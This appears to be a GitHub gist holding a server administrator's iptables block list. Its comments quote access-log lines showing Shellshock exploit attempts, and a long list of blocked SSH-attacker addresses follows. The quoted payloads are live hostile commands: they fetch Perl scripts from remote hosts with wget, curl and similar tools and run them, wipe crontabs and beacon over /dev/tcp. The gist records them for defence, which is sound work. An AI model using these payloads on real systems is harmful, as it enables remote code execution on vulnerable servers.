Last active
August 29, 2015 14:16
-
-
Save donnykurnia/3b5a52d696ccf58c01e3 to your computer and use it in GitHub Desktop.
iptables block list 2015-03-08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# shellshock exploit | |
# 209.236.133.201 - - [02/Mar/2015:15:50:03 +0700] "GET /cgi-bin/sip.cgi HTTP/1.0" 301 178 "-" "() { :;}; /bin/bash -c \x22cd /var/tmp ; wget http://151.236.44.210/ft.exe ; curl -O http://151.236.44.210/ft.exe;perl ft.exe;perl /var/tmp/ft.exe;perl ft.exe\x22" | |
iptables -I INPUT -s 209.236.133.201 -j DROP | |
iptables -A OUTPUT -d 151.236.44.210 -j DROP | |
# 31.184.194.114 - - [04/Mar/2015:10:29:53 +0700] "GET /fcgi-php/php HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\x22);'" | |
iptables -I INPUT -s 31.184.194.114 -j DROP | |
iptables -A OUTPUT -d 64.32.12.152 -j DROP | |
# 50.22.0.250 - - [25/Feb/2015:21:45:24 +0000] "GET HTTP/1.1 HTTP/1.1" 400 418 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://87.106.130.7/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://87.106.130.7/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'" | |
iptables -I INPUT -s 50.22.0.250 -j DROP | |
iptables -A OUTPUT -d 87.106.130.7 -j DROP | |
# 68.116.30.102 - - [27/Feb/2015:08:11:45 +0700] "GET /cgi-bin/test-cgi HTTP/1.1" 301 178 "() { :;}; /bin/bash -c \x22echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80\x22" "() { :;}; /bin/bash -c \x22echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80\x22" | |
iptables -I INPUT -s 68.116.30.102 -j DROP | |
iptables -A OUTPUT -d 23.227.199.185 -j DROP | |
# 186.211.96.170 - - [23/Feb/2015:22:25:23 +0700] "GET / HTTP/1.1" 301 178 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3130342e3135332e3230392e3234\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3130342e3135332e3230392e3234\x22" | |
# 216.245.134.238 - - [26/Feb/2015:18:33:15 +0700] "GET / HTTP/1.0" 301 101 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3132382e3139392e3131362e3533\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3132382e3139392e3131362e3533\x22" | |
iptables -I INPUT -s 186.211.96.170 -j DROP | |
iptables -I INPUT -s 216.245.134.238 -j DROP | |
# ssh attacker | |
iptables -I INPUT -s 14.63.161.216 -j DROP | |
iptables -I INPUT -s 49.213.16.131 -j DROP | |
iptables -I INPUT -s 49.236.204.180 -j DROP | |
iptables -I INPUT -s 54.235.163.229 -j DROP | |
iptables -I INPUT -s 58.42.252.116 -j DROP | |
iptables -I INPUT -s 58.64.3.29 -j DROP | |
iptables -I INPUT -s 58.145.168.162 -j DROP | |
iptables -I INPUT -s 61.160.215.102 -j DROP | |
iptables -I INPUT -s 61.160.247.14 -j DROP | |
iptables -I INPUT -s 62.210.141.204 -j DROP | |
iptables -I INPUT -s 64.150.187.95 -j DROP | |
iptables -I INPUT -s 65.207.23.201 -j DROP | |
iptables -I INPUT -s 82.165.151.97 -j DROP | |
iptables -I INPUT -s 82.194.76.182 -j DROP | |
iptables -I INPUT -s 87.106.151.126 -j DROP | |
iptables -I INPUT -s 88.156.77.176 -j DROP | |
iptables -I INPUT -s 91.240.163.39 -j DROP | |
iptables -I INPUT -s 95.70.201.28 -j DROP | |
iptables -I INPUT -s 95.77.16.45 -j DROP | |
iptables -I INPUT -s 103.41.124.0/24 -j DROP | |
iptables -I INPUT -s 104.130.166.23 -j DROP | |
iptables -I INPUT -s 104.167.104.147 -j DROP | |
iptables -I INPUT -s 104.207.144.209 -j DROP | |
iptables -I INPUT -s 107.182.140.36 -j DROP | |
iptables -I INPUT -s 108.229.25.10 -j DROP | |
iptables -I INPUT -s 109.166.212.230 -j DROP | |
iptables -I INPUT -s 109.169.74.58 -j DROP | |
iptables -I INPUT -s 111.74.239.39 -j DROP | |
iptables -I INPUT -s 112.217.177.82 -j DROP | |
iptables -I INPUT -s 112.220.204.42 -j DROP | |
iptables -I INPUT -s 113.195.145.0/24 -j DROP | |
iptables -I INPUT -s 115.230.126.151 -j DROP | |
iptables -I INPUT -s 115.231.218.130 -j DROP | |
iptables -I INPUT -s 115.231.218.131 -j DROP | |
iptables -I INPUT -s 115.231.222.45 -j DROP | |
iptables -I INPUT -s 115.231.222.176 -j DROP | |
iptables -I INPUT -s 115.239.228.0/24 -j DROP | |
iptables -I INPUT -s 121.61.19.0/24 -j DROP | |
iptables -I INPUT -s 151.249.136.71 -j DROP | |
iptables -I INPUT -s 173.193.162.83 -j DROP | |
iptables -I INPUT -s 182.100.67.113 -j DROP | |
iptables -I INPUT -s 182.100.67.115 -j DROP | |
iptables -I INPUT -s 183.136.216.0/24 -j DROP | |
iptables -I INPUT -s 198.12.149.20 -j DROP | |
iptables -I INPUT -s 198.199.70.171 -j DROP | |
iptables -I INPUT -s 200.29.21.26 -j DROP | |
iptables -I INPUT -s 200.106.151.126 -j DROP | |
iptables -I INPUT -s 200.222.72.170 -j DROP | |
iptables -I INPUT -s 202.121.199.171 -j DROP | |
iptables -I INPUT -s 202.123.179.226 -j DROP | |
iptables -I INPUT -s 218.28.103.231 -j DROP | |
iptables -I INPUT -s 218.87.111.108 -j DROP | |
iptables -I INPUT -s 218.87.111.110 -j DROP | |
iptables -I INPUT -s 218.106.254.121 -j DROP | |
iptables -I INPUT -s 221.203.3.0/24 -j DROP | |
iptables -I INPUT -s 221.224.10.50 -j DROP | |
iptables -I INPUT -s 221.226.106.188 -j DROP | |
iptables -I INPUT -s 222.101.130.145 -j DROP | |
iptables -I INPUT -s 222.186.50.164 -j DROP | |
iptables -I INPUT -s 222.186.56.40 -j DROP | |
iptables -I INPUT -s 222.186.56.41 -j DROP | |
iptables -I INPUT -s 222.186.58.70 -j DROP | |
iptables -I INPUT -s 222.186.197.76 -j DROP | |
service iptables-persistent save |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment